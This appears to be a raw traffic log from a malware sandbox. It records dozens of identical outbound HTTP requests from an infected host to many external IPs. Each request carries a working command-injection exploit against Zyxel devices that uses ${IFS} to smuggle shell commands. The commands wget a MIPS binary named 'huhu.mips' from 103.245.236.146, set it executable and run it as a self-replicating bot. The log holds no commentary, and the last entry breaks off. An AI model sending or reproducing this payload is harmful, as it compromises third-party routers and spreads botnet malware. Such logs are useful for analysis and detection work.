                                      Jan 19, 2024 17:29:38.903889894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6007192.168.2.145472668.195.236.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903911114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6008192.168.2.1455372153.26.199.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903944016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6009192.168.2.1443820129.249.151.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.903984070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6010192.168.2.1438580113.30.150.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904041052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6011192.168.2.145848235.24.143.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904078960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6012192.168.2.1436918124.147.148.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904102087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6013192.168.2.1459492121.200.122.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904141903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6014192.168.2.1438404208.233.134.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904172897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6015192.168.2.144876278.33.47.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904222012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6016192.168.2.145987013.158.158.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904273033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6017192.168.2.145027023.157.254.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904325962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6018192.168.2.1446078160.76.26.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904357910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6019192.168.2.1449012139.11.85.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904388905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6020192.168.2.1445610108.180.115.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904432058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6021192.168.2.1457116154.253.233.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904489994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6022192.168.2.144729084.140.1.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904520988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6023192.168.2.144642665.89.42.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904561996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6024192.168.2.145630839.60.44.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904578924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6025192.168.2.1447698152.252.215.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904648066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6026192.168.2.1458158179.121.55.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904690981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6027192.168.2.1441488128.251.71.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904726028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6028192.168.2.1452678200.164.119.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904761076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6029192.168.2.1439140206.66.84.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904799938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6030192.168.2.1446182193.87.133.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904848099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6031192.168.2.143948664.146.112.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904892921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6032192.168.2.1449272107.105.190.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904915094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6033192.168.2.1442852183.188.39.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904951096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6034192.168.2.145158486.52.186.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.904983997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6035192.168.2.1453886130.19.115.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905020952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6036192.168.2.144494417.183.157.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905075073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6037192.168.2.1460878208.136.74.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905128956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6038192.168.2.144470078.151.179.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905150890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6039192.168.2.1455226220.196.86.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905213118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6040192.168.2.144983888.158.89.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905240059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6041192.168.2.1441024144.15.224.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905276060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6042192.168.2.1448260165.29.84.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905328035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6043192.168.2.1447650126.15.14.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905374050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6044192.168.2.1444574105.2.2.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905419111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6045192.168.2.1449312116.245.78.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905471087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6046192.168.2.1439210196.29.106.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.905517101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6047192.168.2.1443728223.151.167.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:38.908679962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6048192.168.2.1446424176.181.255.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.908766985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6049192.168.2.1453258216.136.146.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.908835888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6050192.168.2.1446544177.77.163.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.908890963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6051192.168.2.144870632.154.188.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.908952951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6052192.168.2.1438820137.206.182.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909065962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6053192.168.2.1451748121.177.243.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909122944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6054192.168.2.1438548128.181.182.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909166098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6055192.168.2.144777685.135.197.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909218073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6056192.168.2.1450408101.229.187.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909245968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6057192.168.2.144900647.78.119.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909284115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6058192.168.2.1444358125.55.83.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909312963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6059192.168.2.1458068152.77.121.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909367085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6060192.168.2.1444282194.228.100.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909418106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6061192.168.2.1450618182.29.45.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909430981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6062192.168.2.1453950197.244.215.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909460068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6063192.168.2.1441352145.100.49.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909497976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6064192.168.2.143456493.70.65.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909552097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6065192.168.2.1451664169.0.184.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909596920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6066192.168.2.145366452.169.199.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909603119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6067192.168.2.144743494.82.148.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909636974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6068192.168.2.1451948134.17.139.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909696102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6069192.168.2.1441560161.139.41.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:39.909723997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6070192.168.2.1437358165.170.210.2443
                                      TimestampBytes transferredDirectionData
